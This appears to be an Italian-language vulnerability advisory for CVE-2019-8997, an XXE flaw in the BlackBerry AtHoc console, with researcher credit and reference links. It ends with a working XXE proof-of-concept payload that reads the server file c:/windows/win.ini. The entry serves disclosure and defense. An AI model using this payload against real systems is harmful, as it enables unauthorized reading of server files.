
Una vulnerabilità di Iniezione di Entità Esterne XML (XXE) nel Management System (console) di BlackBerry AtHoc versioni precedenti alla 7.6 HF-567 potrebbe consentire a un attaccante di leggere potenzialmente file locali arbitrari dal server applicativo o effettuare richieste sulla rete inserendo XML appositamente modificato in un campo esistente.
Una vulnerabilità di XML External Entity Injection (XXE) nel Management System (console) di BlackBerry AtHoc, versioni precedenti alla 7.6 HF-567, potrebbe potenzialmente consentire a un utente malintenzionato di leggere file locali arbitrari dal server dell'applicazione o effettuare richieste sulla rete inserendo XML appositamente predisposto in un campo esistente.
Nolan B. Kennedy (nxkennedy)
http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997
https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/
<!DOCTYPE doc [
<!ELEMENT doc ANY >
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">
<doc>&foo;</doc>
<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>